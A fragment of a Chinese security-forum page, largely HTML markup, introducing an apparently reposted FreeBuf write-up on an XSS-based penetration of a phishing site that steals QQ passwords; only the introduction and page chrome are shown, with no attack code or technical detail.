15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word;">一个钓鱼站大概一天上百个账号密码，不知道有多少人QQ是这样被盗的</span><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word;"></span></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word;">此次渗透，可能话比较多，各位别介意，这也是为了XSS基础比较薄弱的学友考虑~~嘿嘿~~~</span></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word; color: rgb(159, 163, 168);"><span style="box-sizing: border-box; font-weight: 700;">转载自 FreeBuf.COM&nbsp;</span></span></p><p><br/></p>

打赏我,让我更有动力~

0 条回复   |  直到 2018-5-28 | 4468 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2025 掌控者 All Rights Reserved.